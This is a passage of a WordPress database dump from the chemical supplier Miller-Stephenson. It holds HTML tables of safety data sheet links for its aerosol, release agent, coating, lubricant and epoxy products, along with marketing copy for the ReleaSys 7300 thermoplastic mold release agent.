5522-WY-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-10-16.pdf">MS-143TE-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3015.pdf">EPIKURE 3015</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-82-16.pdf">ReleaSys 82</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3046.pdf">EPIKURE 3046</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/765.pdf">MS-765</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-85-16.pdf">ReleaSys 85</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3055.pdf">EPIKURE 3055</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-88-16.pdf">ReleaSys 88</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3115.pdf">EPIKURE 3115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-89-16.pdf">ReleaSys 89</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/04/3125.pdf">EPIKURE 3125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8200-16.pdf">ReleaSys 8200</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/3140-1.pdf">EPIKURE 3140</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8500-16.pdf">ReleaSys 8500</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3155.pdf">EPIKURE 3155</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8800-16.pdf">ReleaSys 8800</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3164.pdf">EPIKURE 3164</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8900-16.pdf">ReleaSys 8900</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3223.pdf">EPIKURE 3223</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122AVL-16.pdf">MS-122AVL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3234.pdf">EPIKURE 3234</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122SEL-16.pdf">MS-122SEL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3245.pdf">EPIKURE 3245</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/110XN-16.pdf">MS-110XN</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-BLUE-16.pdf">MS-143TE Blue</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3253.pdf">EPIKURE 3253</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120X.pdf">MS-120X</a></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3270.pdf">EPIKURE 3270</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120XXP.pdf">MS-120X-XP</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3271.pdf">EPIKURE 3271</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805A.pdf">H0805A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3274.pdf">EPIKURE 3274</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/J0912A.pdf">J0912A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3282.pdf">EPIKURE 3282</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K0725A.pdf">K0725A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3290.pdf">EPIKURE 3290</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1016A.pdf">K1016A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3295.pdf">EPIKURE 3295</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/530N-17.pdf">MS-530N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/W.pdf">CURING AGENT W</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/532N-16.pdf">MS-532N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K54.pdf">ANCAMINE K54</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/538N-17.pdf">MS-538N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K61B.pdf">ANCAMINE K61B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/539N-16.pdf">MS-539N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BDMA.pdf">BDMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/550N-16.pdf">MS-550N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BF3400.PDF">BF3-400</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/552N-16.pdf">MS-552N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/DEAPA.pdf">DEAPA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/580N-16.pdf">MS-580N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NMA.pdf">NMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/582N-16.pdf">MS-582N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V115.pdf">VERSAMID 115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/747-16.pdf">MS-747</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V125.pdf">VERSAMID 125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V140.pdf">VERSAMID 140</a></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2017-06-16 15:32:07', '2017-06-16 15:32:07', '', 1842, 'https://www.miller-stephenson.com/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4593, 3, '2017-06-16 16:03:58', '2017-06-16 16:03:58', '<h2>ReleaSys™ 7300 | Thermoplastic Mold Release Agent</h2>\r\n<h3>Superior Durability; Rapid Cure; Ideal for Rapid, High Output Molding Operations</h3>\r\nReleaSys™ 7300 Thermoplastic Mold Release Agent is a semi-permanent mold release agent designed to provide superior durability and surface adhesion in cold molding operations. Utilization of a proprietary release agent and solvent system rapidly accelerates the drying and cure process allowing for fast reapplication internals.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal build-up.  ReleaSys 7300 binds tenaciously to the mold surface to provide extended re-application intervals on room temperature and chilled mold surfaces. ReleaSys 7300 Thermoplastic Mold Release Agent is particular effective on all thermosetting and thermoplastics as well as polyurethane foams, resins, and RIM molding operations  Benefits include:\r\n<ul>\r\n 	<li>Rapid cure: No heating required</li>\r\n 	<li>Highly-effective on Room Temp / Chilled molds</li>\r\n 	<li>Exceptional durability and surface adhesion</li>\r\n 	<li>Clean; Non-oily; Non-migrating</li>\r\n 	<li>No post-molding cleaning required</li>\r\n</ul>\r\n<h3>High-Performance Thermosetting / Thermoplastic Mold Release Agent</h3>\r\nReleaSys 7300 was developed as a thermoplastic release agent offering optimized cycle times, consistency of surface finish, and reduction/ elimination of post mold operations prior to painting, gluing or welding. Miller-Stephenson is an excellent partner to help develop and grow your plastic molding operation.  Our highly cost-effective and efficient mold release agents were designed with your concerns in mind.  ReleaSys 7300 provides <strong>optimized resin flow</strong> -  resulting in lower scrap rates and shorter cycles times, <strong>low release agent usage rate</strong> - lowering your operational cost, and <strong>non-silicone ingredients</strong> - minimizing any downstream complications. Our range of ReleaSys semi-permanent thermoplastic mold release agents, provide you with high-performance molding solution. Couple this advanced chemistry with our elite technical staff and superior customer service and you have a formula which facilitates successful growth of your company and substantial cost-savings.\r\n<h3>Protection of your Mold Surface, Decrease Scrap Rates, Improved Part Quality</h3>\r\nReleaSys 7300 Thermoplastic mold release agent binds and protects your mold surface both during and after the molding process, eliminating embedding of molding material into the pores of your mold.  This barrier allows your plastics to flow and cure without worry of any fusion onto the mold surface, protecting your expensive mold investment. Our release system is non-sacrifiscal, meaning it tenaciously adheres to the mold surface, providing the protection and ease of release your mold requires, cycle after cycle.\r\n<h3>50+ years of Industry Expertise at your service</h3>\r\nMiller-Stephenson has had a long history in composite molding industries, and our ReleaSys brand of products are respected around the world for quality and reliability. When you purchase Miller-Stephenon ReleaSys Semi-Permanent mold release agents you not only get industry leading products, you also gain access to our many years of direct production floor experience. We understand your production issues and can help you optimize your mold preparation, maintenance and release processes to improve your bottom line.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a>\r\n\r\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">Click here for information, Which mold release agent is right for you</a></strong>', 'ReleaSys™ 7300 | Thermoplastic Mold Release Agent', 'ReleaSys™ 7300  is a semi-permanent mold release agent designed to provide superior durability and surface adhesion in cold molding operations. Utilization of a proprietary release agent and solvent system rapidly accelerates the drying and cure process allowing fast reapplication internals.  This product adheres strongly to the mold surface to provide extended re-application intervals on room temperature and chilled mold surfaces. ReleaSys 7300 is particular effective on all thermosetting and thermoplastics as well as polyurethane foams, resins, and RIM molding operations  Benefits include:\r\n<ul>\r\n 	<li>Rapid cure: No heating required</li>\r\n 	<li>Ideal for high output molding operations</li>\r\n 	<li>Highly-effective on Room Temp / Chilled molds</li>\r\n 	<li>Exceptional durability and surface adhesion</li>\r\n 	<li>No post-molding cleaning required</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'thermoplastic-mold-release-agent', '', '', '2017-06-26 00:50:27', '2017-06-26 00:50:27', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=4593', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (4594, 3, '2017-06-16 15:37:57', '2017-06-16 15:37:57', '', 'Mold Release for Polyurethane', '', 'inherit', 'closed', 'closed', '', '4578-revision-v1', '', '', '2017-06-16 15:37:57', '2017-06-16 15:37:57', '', 4578, 'https://www.miller-stephenson.com/4578-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4595, 3, '2017-06-26 00:49:51', '2017-06-26 00:49:51', '<h2>ReleaSys™ 7300 | Thermoplastic Mold Release Agent</h2>\n<h3>Superior Durability; Rapid Cure; Ideal for Rapid, High Output Molding Operations</h3>\nReleaSys™ 7300 Thermoplastic Mold Release Agent is a semi-permanent mold release agent designed to provide superior durability and surface adhesion in cold molding operations. Utilization of a proprietary release agent and solvent system rapidly accelerates the drying and cure process allowing for fast reapplication internals.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal build-up.  ReleaSys 7300 binds tenaciously to the mold surface to provide extended re-application intervals on room temperature and chilled mold surfaces. ReleaSys 7300 Thermoplastic Mold Release Agent is particular effective on all thermosetting and thermoplastics as well as polyurethane foams, resins, and RIM molding operations  Benefits include:\n<ul>\n 	<li>Rapid cure: No heating required</li>\n 	<li>Highly-effective on Room Temp / Chilled molds</li>\n 	<li>Exceptional durability and surface adhesion</li>\n 	<li>Clean; Non-oily; Non-migrating</li>\n 	<li>No post-molding cleaning required</li>\n</ul>\n<h3>High-Performance Thermosetting / Thermoplastic Mold Release Agent</h3>\nReleaSys 7300 was developed as a thermoplastic release agent offering optimized cycle times, consistency of surface finish, and reduction/ elimination of post mold operations prior to painting, gluing or welding. Miller-Stephenson is an excellent partner to help develop and grow your plastic molding operation.  Our highly cost-effective and efficient mold release agents were designed with your concerns in mind.  ReleaSys 7300 provides <strong>optimized resin flow</strong> -  resulting in lower scrap rates and shorter cycles times, <strong>low release agent usage rate</strong> - lowering your operational cost, and <strong>non-silicone ingredients</strong> - minimizes any downstream complications. Our range of ReleaSys semi-permanent thermoplastic mold release agents, provide you with high-performance molding solution. Couple this advanced chemistry with our elite technical staff and superior customer service and you have a formula which facilitates successful growth of your company and substantial cost-savings.\n<h3>Protection of your Mold Surface, Decrease Scrap Rates, Improved Part Quality</h3>\nReleaSys 7300 Thermoplastic mold release agent binds and protects your mold surface both during and after the molding process, eliminating embedding of molding material into the pores of your mold.  This barrier allows your plastics to flow and cure without worry of any fusion onto the mold surface, protecting your expensive mold investment. Our release system is non-sacrifiscal, meaning it tenaciously adheres to the mold surface, providing the protection and ease of release your mold requires, cycle after cycle.\n<h3>50+ years of Industry Expertise at your service</h3>\nMiller-Stephenson has had a long history in composite molding industries, and our ReleaSys brand of products are respected around the world for quality and reliability. When you purchase Miller-Stephenon ReleaSys Semi-Permanent mold release agents you not only get industry leading products, you also gain access to our many years of direct production floor experience. We understand your production issues and can help you optimize your mold preparation, maintenance and release processes to improve your bottom line.\n\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a>\n\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">Click here for information, Which mold release agent is right for you</a></strong>', 'ReleaSys™ 7300 | Thermoplastic Mold Release Agent', 'ReleaSys™ 7300  is a semi-permanent mold release agent designed to provide superior durability and surface adhesion in cold molding operations. Utilization of a proprietary release agent and solvent system rapidly accelerates the drying and cure process allowing fast reapplication internals.  This product adheres strongly to the mold surface to provide extended re-application intervals on room temperature and chilled mold surfaces. ReleaSys 7300 is particular effective on all thermosetting and thermoplastics as well as polyurethane foams, resins, and RIM molding operations  Benefits include:\n<ul>\n 	<li>Rapid cure: No heating required</li>\n 	<li>Ideal for high output molding operations</li>\n 	<li>Highly-effective on Room Temp / Chilled molds</li>\n 	<li>Exceptional durability and surface adhesion</li>\n 	<li>No post-molding cleaning required</li>\n</ul>', 'inherit', 'closed', 'closed', '', '4593-autosave-v1', '', '', '2017-06-26 00:49:51', '2017-06-26 00:49:51', '', 4593, 'https://www.miller-stephenson.com/4593-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4596, 3, '2017-06-16 16:48:50', '2017-06-16 16:48:50', '', 'ReleaSys 7300 TDS', '', 'inherit', 'closed', 'closed', '', 'releasys-7300', '', '', '2017-06-16 16:49:04', '2017-06-16 16:49:04', '', 4593, 'https://www.miller-stephenson.com/wp-content/uploads/2017/06/ReleaSys-7300.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4597, 0, '2017-06-16 17:06:28', '2017-06-16 17:06:28', '', '', '', 'publish', 'closed', 'closed', '', '4597', '', '', '2017-06-16 17:06:29', '2017-06-16 17:06:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/4597/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4598, 2, '2017-06-16 17:34:03', '2017-06-16 17:34:03', '<h1>Miller-Stephenson SDS database.</h1>\r\n&nbsp;\r\n<form role="search" method="get" id="searchform" class="searchform" action="http://www.example.com/"> \r\n<label class="screen-reader-text" for="s">Search for:</label> \r\n<input type="text" value="" name="s" id="s" /> \r\n<input type="submit" id="searchsubmit" value="Search" /> \r\n</form>\r\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 203-743-4447 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/124H-15.pdf">MS-124H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/111.pdf">MS-111</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AD.pdf">MS-122AD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/452N.pdf">MS-452N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AGL683.pdf">AGL 683</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/900.pdf">MS-900</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222L.pdf">MS-222L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/114C.pdf">MS-114C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADRED.pdf">MS-122AD RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/460H.pdf">MS-460H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AT.pdf">AT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905A.pdf">MS-905 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/115.pdf">MS-115</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADL.pdf">MS-122ADL</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/462H.pdf">MS-462H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/ATA.pdf">ATA</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905B.pdf">MS-905 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222T</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/182SD.pdf">MS-182SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AV.pdf">MS-122AV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/465C.pdf">MS-465C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2A45.pdf">AUT 2A45</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907A.pdf">MS-907 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222F</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126H.pdf">MS-126H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122E.pdf">MS-122E</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/467C.pdf">MS-467C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT523.pdf">AUT 523</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907B.pdf">MS-907 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242L.pdf">MS-242L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126HUV.pdf">MS-126HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ERED.pdf">MS-122E RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/470C-16.pdf">MS-470C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT1045.pdf">AUT 1045</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/908A.pdf">MS-908 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/04/242L-AS-17.pdf">MS-242L-AS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383A.pdf">MS-383A</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122SE.pdf">MS-122SE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/02/472C-15.pdf">MS-472C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2045.pdf">AUT 2045</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/908B.pdf">MS-908 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242N.pdf">MS-242N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383H.pdf">MS-383H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122SD.pdf">MS-122SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/470S-16.pdf">MS-470S</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2245.pdf">AUT 2245</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/910A.pdf">MS-910 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/05/242N-AS-17.pdf">MS-242N-AS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383HUV.pdf">MS-383HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122XD.pdf">MS-122XD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/472S.pdf">MS-472S</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143.pdf">143 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/910B.pdf">MS-910 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381H.pdf">MS-381H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/252.pdf">MS-252</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/132FE.pdf">MS-132FE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/475C.pdf">MS-475C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL10X.pdf">GPL 10X SERIES</a></td>\r\n<td 